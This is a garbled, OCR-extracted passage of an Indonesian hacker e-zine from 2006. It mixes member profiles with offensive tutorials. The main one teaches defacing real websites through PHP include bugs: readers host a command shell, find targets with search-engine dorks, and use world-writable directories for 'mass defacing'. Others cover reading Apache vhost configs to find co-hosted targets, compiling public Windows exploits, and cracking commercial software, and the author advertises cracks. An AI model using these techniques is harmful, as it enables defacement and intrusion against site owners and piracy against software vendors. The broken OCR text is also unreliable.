mengirim email..tapi ngga pernah ada konfirmasi balik :( sampai
akhirnya saya berhasil chatting dengan family_code di
66
#yogyafree dengan nickname koyakaguya (masih inget ngga
mas... kayanya lupa deh :))dan dikonfirmasi bahwa untuk jadi member
cukup join dimilis saja (oh berarti saya dah jadi members dong :))
67
Member pasif itulah julukan yang pantas buat saya karena
hanya sekedar mencari artikel, DL tools, n crawling situs yogyafree
(setau saya waktu itu belom ada mirrornya) tanpa terlalu aktif dimilis
sampai akhirnya yogyafree sulit untuk diakses dan sayapun cukup
lama hilang kontak dengan situs ini. Akhirnya saya coba untuk
melihat kembali komunitas ini dan ternyata sudah
sangat berbeda...lengkap dengan forum, friendster dan
sebagainya deh (kagum gw).
(C)opyleft 30 Juni
2006
/ _ \/ \| \ | | / \| |
/ /_) \ _ \ \| | | \| |
/ / (_) | | | |
/ | \ / |\ | | |\ |
/ | \ /| |\ | \ |\ |
[Link]
68
Profil Mbak Nita Si programmer
(PushM0v)
Kenal Komputer sejak TK, waktu itu pernah dapet juara 2 lomba
Komputer. Trus ampe SD masih main komputer, tapi pas SMP
komputer dah gak pegang lagi karena rusak T_T.
70
- Networking
- Operating System Development
71
Deface with PHP
Bugs
Assalamu’alaikum all, pa
khabare ???
Penulis doain ente-ente semua semoga dalam lindungan Allah SWT
dan selalu sehat juga selalu semangat selalu yah.
Kali ini penulis ingin membahas tentang bug yang udah lama, soalnya
penulis pribadi paling jarang baca-baca tentang bug baru, dan paling
malas ngikutin perkembangan zaman, wekekekeke... ☺ makanye
penulis di sini bakal nulis bug yang udah lama. Bug ini penulis namain
bug “tusuk-tusuk” tapi mungkin semua pada bilang ini bug namanya
inject php bug ☺.
Sebelum kita memulai ngelakuin bug ini di target kita, ada baiknya
ente-ente semua mengcopy dan paste code berikut ini ke website
ente-ente sekalian, entah itu di geocities, portland, atau di hosting ente
terserah dah... sabodo tuing !!!
Oh iya, penulis lupa bilang ke ente semua, kalo ente semua udah tau
tentang ini bug ato udah ngerasa expert dengan dodolz-nya dunia
newbies, maka penulis saranin ente beralih ke tutorial ato artikel laen
aja, daripada habisin badwith ente pada :P~ hehehe...
Ini dia code yang musti ente copy-paste ke site ente semua ( note :
bagi ente-ente yang udah ada code ini di site ente, gak perlu lagi, ini
bagi yang belom ada aja ).
73
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<",
$output));
?>
</font></pre>
<br>
<hr>
<br>
<font face="Verdana" size="1">
<b># m_beben from #kartubeben @ Dalnet</b><br>
<b># [Link] | [Link] | [Link]</b>
<br><b># Come and join with us on #kartubeben @ Dalnet</b>
</font>
Hmm... mungkin ada yang tanya, maksud penulis sebenarnya apa seh
dan gimana cara masukin code ini ke site kite-kita pada ??? Gini lho
maksud penulis : ( ini kita balik ke dasar lagi yah )
Seep... sekarang code tadi udah kita simpan di hosting kita, jadi kita
bisa ngakses tuh code entar di
[Link]/pukisek/[Link]
ato [Link]/pukisek/[Link].
74
Nah, sekarang untuk masalah targetnya, kita bisa cari di [Link] ☺
dengan keyword allinurl: “[Link]?*=*.htm*” ato allinurl:
“[Link]?*=*.php” bisa
75
juga allinurl: “[Link]?*=*.htm*” ato allinurl: “[Link]?*=*.php”
pokoke terserah entelah mo pake apa keywordnya ☺☺☺
Okeh, kita gak bahas tentang penulis ini seorang carder apa bukan,
yang penting ente semua bisa tentang masalah bug php ini, kalo
tetap gak bisa, ente semua bisa penulis Ge-bug, wekekeke ☺☺☺
Nah, makanya jangan keburu nyesel dulu kalo liat ada target kita yang
gak bisa dideface (dengan asumsi kita malas ngeroot di target
tersebut macam penulis
☺). Pertama-tama untuk melihat sebuah permisi file apakah
sebanding dengan
user id yang kita jalankan, maka gunakan command id lalu ls –la
namun jangan keburu sedih dulu kalo ternyata user yang kita pake
adalah nobody dan user yang nulis file di target adalah bebenkeren
misalnya.
76
Hmm... lalu kita perhatikan permisi file di target kita, apakah ada yang
bisa kita tulisi ? Biasanya karena kita nobody, file yang bisa ditulisi
nobody adalah file yang allow write permission di bagian othernya
(penulis sulit menjelaskannya, jadi sorry aja yah ☺)
77
$ls –l
total 1023
drwxrwxrwx 100 bebenkeren kartubeben 43203 kartubeben
drwx---rw- 3 bebenkeren kartubeben 1234 deface
drwxr-xr-x 11 bebenkeren kartubeben 23421 hosting
drwx------ 1000 bebenkeren kartubeben 12345 secret
-rwxr-xr-x 1 bebenkeren kartubeben 1234 [Link]
-rwxrwxrwx 1 bebenkeren kartubeben 2332 [Link]
Jika kita perhatikan contoh hasil command ls -l di atas, maka user yang
menulis di target adalah bebenkeren dengan group kartubeben
sedangkan id yang kita jalankan adalah nobody, maka file yang dapat
kita tulisi ato kita deface adalah folder kartubeben dan deface karena
kedua file tersebut memiliki permisi yang dapat ditulisi oleh other. Jadi
misalnya nama domain target kita adalah [Link] maka
kita bisa mempublikasikan hasil deface kita di
[Link]/kartubeben ato di [Link]/deface.
Trus gimana kalo target kita ketika kita cek ternyata hasilnya
adalah seperti
berikut
:
$ls –l
total 1023
drwxr-xr-x 555 root root 50000 .
drwxrwxrwx 100 apache apache 40000 ..
drwxrwxr-x 100 bebenkeren kartubeben 43203 kartubeben
drwx---r-- 3 bebenkeren kartubeben 1234 deface
drwxr-xr-x 11 bebenkeren kartubeben 23421 hosting
drwx------ 1000 bebenkeren kartubeben 12345 secret
-rwxr-xr-x 1 bebenkeren kartubeben 1234 [Link]
-rwxrwxrwx 1 bebenkeren kartubeben 2332 [Link]
$pwd
/home/kartubeben/
Hmm... jika kita melihat sepintas maka tak ada file yang bisa kita tulisi
sehingga kita tidak dapat mendeface target tersebut, tetapi tunggu
dulu !!!. Coba kita perhatikan dengan seksama ternyata
directory .. ato directory
sebelumnya/dibelakangnya ternyata memiliki permisi yang dapat
ditulisi oleh account nobody sebagai other, dan wow !!! jika kita
mendapati target yang demikian kita bisa melalukan mass defacing !!!
wekekeke... ☺☺☺
Penulis kagak mau berlama-lama dalam menulis tutorial kali ini, jadi
hanya sampai di sini penulis share ilmu penulis ke ente semua
para newbies. So, tinggal perpikir selangkah lagi untuk dapat
melakukan deface ☺ tetapi kalo mau seh, simpelnya anda tinggal
upload bindtty ke target trus pasang ribuan ato kalo sanggup jutaan
exploit ke site target, kemudian dapatin root tuh target lalu maenkan
tuh target, tetapi umumnya kalo ente udah dapat root mending jangan
78
deface lagi ☺☺☺
Penulis : M_Beben
79
Greatz : #kartubeben crew @ [Link]
- K-159 and all of #aikmel crew and staff
- the_day, y3dips and all of #e-c-h-o crew and staff
- kevin yang udah banyak membantu penulis
- Nixell yang udah berbaik hati kenada penulis
- Sam_stradlin , PARMIN , CupiD^ , pakcik dan semua yang udah
bantu-bantu di #kartubeben
- Special : bang yudhax yang udah mengajari penulis tentang permisi
file di
- Target yang selama ini belom penulis perhatikan, kapan #postgres
dibuka lagi
bang ???
80
Compilasi dengan LCC dan
permasalahannya
Pertama-tama masuk ke program LCC lalu file pilih open, misal disini
Kaht sebagai contohnya yang didapat dari d:\folder lama :
setelah terbuka tekan F9 atau pilih Compiler lalui pilih make, jika
berhasil akan tampil pesan seperti dibawah ini.
81
Setelah itu kita coba lagi kompilasi exploit lainnya, dan pasti
terjadi permasalahan yaitu exploit berikutnya tidak bisa
dicompile walaupun sudah diclose source sebelumnya, untuk
solusinya, pada program LCC perhatikan menu project lalu lalu pilih
Configuration, lalu perhatikan pada output “Project table file path”,
hapuslah file [Link] yang ada di folder tersebut.
82
Setelah file ini dihapus maka otomatis LCC kembali seperti semula
dan anda bisa mengcompile exploit lainnya lagi, mengapa bisa
demikian ? ini disebabkan project masih terset di file [Link]
dengan isi
[Projects]
Kaht=D:\Folder lama\[Link]
ata
u
kalau masih ada syntax yang error lmaka lebih baik kita perhatikan
sourcenya sekali lagi, kita perbaiki yang error baru di compile lagi.
Karena yg membuat exploit tidak jalan karena kadang-kadang
83
pembuat exploit menggunakan compiler C/C++ yg versinya ataupun
jenisnya berbeda dengan C Compiler yang kita punya, selain itu
biasa kadang di source di berikan informasi dengan
84
compiler apa kita menginstall seperti di “Microsoft Windows Plug-and-
Play Service Remote Overflow” ditampilkan bahwa kita dapat
mengcompilenya dengan :
Dan kebetulan exploit ini bisa juga di compile dengan LCC, selain VC+
+ dan cygwin, sehingga exploit ini dapat dicompile di beberapa C
Compiler di Windows.
Penulis :
Kurniawan / ^family_code^
Referensi :
- Postingan PusHm0v di Forum
Yogyafree
85
Mencari Alamat Target In One
Hosting
OK, sekarang kite serius ya, ingat... jangan ada lagi yang maen-maen
apalagi becanda. Se... Ri... Us... !!! ... OK !!!
Oh iya, sebelum penulis memulai tulisan ini, maka ada baiknya ente
memperhatikan peringatan penulis berikut ini :
$pwd
/home/recompil/public_html
Nah, itu adalah hasil dari command ls –la di directory /home trus
langkah selanjutnya adalah menentukan name site target yang bakal
kite deface dalam 1 hosting dengan target asli kite ☺☺☺ Oh iya, tadi
ada yang tanya khan kenape directory web usernya adadi
bagian /home dan bukan di bagian
/home/recompil. Nah, sebenarnya di bagian /home/recompil ada
folder
/public_html, file itu memang bawaan yang menjadi ciri khas apache,
jadi sebenarnya letak web user itu ada di /home bukannya di
/home/recompile.
Hmm... belom ngerti juga ya apa yang dimaksud penulis memang
penulis gak bisa begitu jelas menjelaskan yang penulis maksud,
berbelit-belit khan OK...... next, kita gak perlu berhenti di sini. Langkah
selanjutnya adalah melihat dimana letak [Link] target kita. Guna
[Link] adalah sebagai configurasi apache dalam mengatur server.
Lalu tujuan kita mencari [Link] itu adalah untuk melihat vhost
name server target kita (sebenarnya dari sana langsung bisa juga seh
tanpa perlu gunain command pwd ama ls –la segala ☺, tapi kayaknya
gak menarik, soalnya entar tulisan ini gak penuh, wekekeke ☺☺☺).
$locate [Link]
/etc/httpd/conf/[Link]
/etc/httpd/conf/[Link]
/etc/httpd/conf/[Link]
/etc/httpd/conf/[Link]
Jika kita melihat fila hasil output dari command locate, maka jangan
dulu bingung file mana yang harus dilihat. Kita ambil file [Link]
tanpa embel- embel segala sebagi patokan, jadi bukan [Link]
ato [Link]. Ingat [Link] tanpa embel-embel yah.
$cat /etc/httpd/conf/[Link]
..........
<VirtualHost [Link]> ServerAlias [Link]
[Link]
ServerAdmin webmaster@[Link]
DocumentRoot /home/abbeydis/public_html
BytesLog dmlogs/abbeydistribution.c
oom-bytes_log ServerName [Link]
User abbeydis
Group abbeydis
CustomLog domlogs/[Link] combined
ScriptAlias /cgi-bin/ /home/abbeydis/public_html/cgi-bin/
</VirtualHost>
..........
Sebenarnya tampilan file [Link] bukan seperti yang ente lihat itu,
itu hanya sekedar contoh pada bagian vhost user
abbeydis yang memiliki site
[Link] yang meletakkan file-file webnya di
directory
/home/abbeydis/
public_html.
Seep, gimana... udah ngerti khan apa yang penulis
maksudkan ☺☺☺
Kalo belom juga ngerti ya wees, cari diri perngertian sendiri,
wekekeke...
memang penulis terkadang suka banget
ngambek ya :P~
Namun, nah ini namun yah... terkadang di beberapa target,
command locate
malah gak mau jalan, entah itu dikatain bahwa command locate gak
ada dalam daftar command-command yang bisa mereka handle-lah
ato... pokoke yang jelas mereka ngatain bahwa yang namanya locate
itu gak ada, udah digusur kali ama adminnya :P~
$cat /ect/httpd/conf/[Link]
..........
<VirtualHost [Link]> ServerAlias [Link]
[Link]
ServerAdmin webmaster@[Link]
DocumentRoot /home/abbeydis/public_html
BytesLog domlogs/[Link]-bytes_log
ServerName [Link]
User abbeydis
Group abbeydis
CustomLog domlogs/[Link] combined
ScriptAlias /cgi-bin/ /home/abbeydis/public_html/cgi-bin/
</VirtualHost>
..........
Nah, mungkin ada beberapa teknik lain yang belom penulis kuasai,
seperti melihatnya melalui file-file configurasi DNS di target
misalnya :P~ tetapi menurut penulis ini sudahlah cukup. Selamat
berkarya terus para newbies...... eh penulisboleh ngiklan dikit gak
??? kalo boleh, penulis mo ngiklanin
#kartubeben
neh :
gabung-gabung donk ke komunitas kita di channel #kartubeben di
server dalnet
:P~
wekekekeke......
OK, See you next
time !!!
Greatz : #kartubeben crew @
[Link]
K-159 and all of #aikmel crew and
staff
the_day, y3dips and all of #e-c-h-o crew
and staff
kevin yang udah banyak membantu
penulis
Nixell yang udah berbaik hati kenapa
penulis
sam_stradlin , pArMin , CupiD^ , pakcik dan semua yang udah bantu-
bantu di
#kartubeb
en
Special : bang mus di Mina Net yang udah ngajarin penulis
tentang cara
membuat router dan konsep dns di dunia internet walo sekarang
penulis udah lupa lagi.
Teknik Mudah Cracking 4 Software Terbaru
Dachshund Software Jerman
Written By : NeMeSiS_ByTe (on 01-08-06, 11.00pm)
• Oya, jangan lupa Red Ardath, Teh manis, dan Foto keren
NeMeSiS_ByTe yang imut banget..oi, oi☺! Itu hal yang wajib
dipatuhi saat cracking loh..
Langkah crackingnya :
• Saya sengaja menghindari penggunaan SoftIce ataupun
debugger lain (meskipun Saya sendiri suka pakai itu) agar
gak bikin pusing para pemula, lagian tampilan GUI Under DOS
juga jelek tuh ☺. Saya tidak menerapkan breakpoint memori,
Saya hanya akan menggunakan logika aja. Maaf, Saya gak
bermaksud sok pintar ataupun sok 311t3 karena jika ada cara
yang lebih mudah kenapa harus pilih cara yang sulit, bro!?
Gambar 2. Isi
[Link]
Untuk memudahkan dan penyederhanaan ruang lingkup
cracking cukup amati aja apa yang bisa terbaca oleh mata,
agar Anda tidak pusing dulu
(setidaknya itu modal dasar buat pemula). Jika Anda amati ada
kata nologging (ehm, tau khan artinya?), o|on, h{s, 2, dan
myname karakter yang lainnya anggap aja aksesoris..wah,
ternyata enkripsi program ini bego juga yach meski
kinerjanya lumayan cool.. itulah sebagian dosa besar pembuat
compiler VB! Dari sini jika pemahaman binary anda lumayan or
maut pasti cukup smile aja dan gak nerusin baca artikel ini
karena kata dokter bisa mengurangi kecerdasan cracking
para master
311t3 sampai 99% (ehm, efek samping-nya ternyata lebih besar
dari obat diare, he3x!) I am not an 311t3, and I do not want to be
an 311t3, coz NeMeSiS_ByTe merasa gak pantes aja-lah..
About
NeMeSiS_ByTe :
Maaf Saya hanya alumnus fakultas peternakan di Malang,
bukan dari
jurusan yang mempelajari Ilmu Komputer yang seperti teman-teman
duga /, meski beda tapi visi kita sama itu yang bikin hidup lebih
indah.. untuk persaudaraan dan persahabatan kunjungi link
NeMeSiS_ByTe I’m really glad punya banyak teman ☺. Kalau Anda perlu
crack FULL WORKING or Google Hacker ada juga loh. Saya usahakan
selalu terupdate, kalo ada duit ☺.
You can touch me at :
[Link]
You can scream at Me to :
nemesisbyte@[Link]
NeMeSiS_ByTe
commentz to :
• Dachshund Software, secure your software before it
change become warez..sorry about this shit!
• Cracker Group TEAM AGAiN interupt for your new crack
release, EXE Script v2.1.1, don’t touch the silent at 33DB53
otherwise it won’t work better, dude!!!
• You can touch all NeMeSiS_ByTe crack release outside of the
official site at astalavista, freeserial, etc.
----------------------------------------------------
EOF--------------------------------------------------
DapatkanCD YogyafreePro 7 Series
Gratis*
melalui distributor kami di Yogya.
belakang Various
Seleksi Artikel
- Artikel diseleksi, jika artikel anda sesuai dengan kriteria kami
maka kami
akan memasang artikel anda di X-Code
[Link] – [Link]
[Link] – [Link]
TsunamiShell –
[Link]